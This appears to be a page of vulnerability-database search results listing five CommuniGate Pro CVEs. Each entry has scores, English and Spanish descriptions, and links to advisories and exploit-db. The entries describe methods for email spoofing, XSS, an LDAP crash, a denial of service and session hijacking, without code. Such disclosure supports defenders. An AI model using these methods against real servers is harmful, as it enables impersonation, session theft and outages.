9 results (0.008 seconds)

CVSS: 5.7EPSS: 0%CPEs: 1EXPL: 1

The "XML Interface to Messaging, Scheduling, and Signaling" (XIMSS) protocol implementation in CommuniGate Pro (CGP) 6.2 suffers from a Missing XIMSS Protocol Validation attack that leads to an email spoofing attack, allowing a malicious authenticated attacker to send a message from any source email address. The attack uses an HTTP POST request to a /Session URI, and interchanges the XML From and To elements. La implementación en el protocolo XIMSS (XML Interface to Messaging, Scheduling, and Signaling) en CommuniGate Pro (CGP) 6.2 sufre un ataque basado en la ausencia de validación del protocolo XIMSS que conduce a un ataque de suplantación de email, permitiendo a un atacante autenticado malicioso enviar un mensaje desde cualquier dirección de correo. El ataque utiliza una petición HTTP POST a la URI /Session e intercambia los elementos XML "From" y "To". CommunigatePro XML Interface to Messaging, Scheduling, and Signaling protocol ("XIMSS") version 6.2 suffers from a missing XIMSS protocol validation vulnerability that can lead to an email spoofing attack. • https://packetstormsecurity.com/files/145724/communigatepro62-spoof • CWE-287: Improper Authentication •

CVSS: 4.3EPSS: 6%CPEs: 2EXPL: 1

Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. Vulnerabilidad de secuencias de comandos en sitios cruzados (XSS) en el sistema WebMail de Stalker CommuniGate Pro 5.1.8 y anteriores, utilizando Microsoft Internet Explorer, permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elección mediante etiquetas STYLE manipuladas artesanalmente. • https://www.exploit-db.com/exploits/30027 http://marc.info/?l=full-disclosure&m=117900749209206&w=2 http://osvdb.org/36017 http://secunia.com/advisories/25250 http://www.communigate.com/CommuniGatePro/History51.html http://www.scanit.be/advisory-2007-05-12.html http://www.securityfocus.com/bid/23950 http://www.securitytracker.com/id?1018048 http://www.vupen.com/english/advisories/2007/1795 https://exchange.xforce.ibmcloud.com/vulnerabilities/34266 •

CVSS: 7.5EPSS: 31%CPEs: 14EXPL: 1

CommuniGate Pro Core Server before 5.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via LDAP messages with negative BER lengths, and possibly other vectors, as demonstrated by the ProtoVer LDAP test suite. • https://www.exploit-db.com/exploits/27144 http://secunia.com/advisories/18640 http://www.gleg.net/advisory_cg.shtml http://www.securityfocus.com/archive/1/423364/100/0/threaded http://www.securityfocus.com/bid/16407 http://www.stalker.com/CommuniGatePro/History.html http://www.vupen.com/english/advisories/2006/0364 https://exchange.xforce.ibmcloud.com/vulnerabilities/24409 •

CVSS: 5.0EPSS: 1%CPEs: 2EXPL: 0

Unknown vulnerability in the LIST functionality in CommuniGate Pro before 4.3c3 allows remote attackers to cause a denial of service (server crash) via certain multipart messages. • http://secunia.com/advisories/14604 http://www.osvdb.org/15257 http://www.stalker.com/CommuniGatePro/History.html https://exchange.xforce.ibmcloud.com/vulnerabilities/19961 •

CVSS: 5.8EPSS: 0%CPEs: 14EXPL: 2

CommuniGate Pro 3.1 through 4.0.6 sends the session ID in the referer field for an HTTP request for an image, which allows remote attackers to hijack mail sessions via an e-mail with an IMG tag that references a malicious URL that captures the referer. • https://www.exploit-db.com/exploits/27 http://securityreason.com/securityalert/3290 http://www.securityfocus.com/archive/1/320438 http://www.securityfocus.com/bid/7501 https://exchange.xforce.ibmcloud.com/vulnerabilities/11932 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •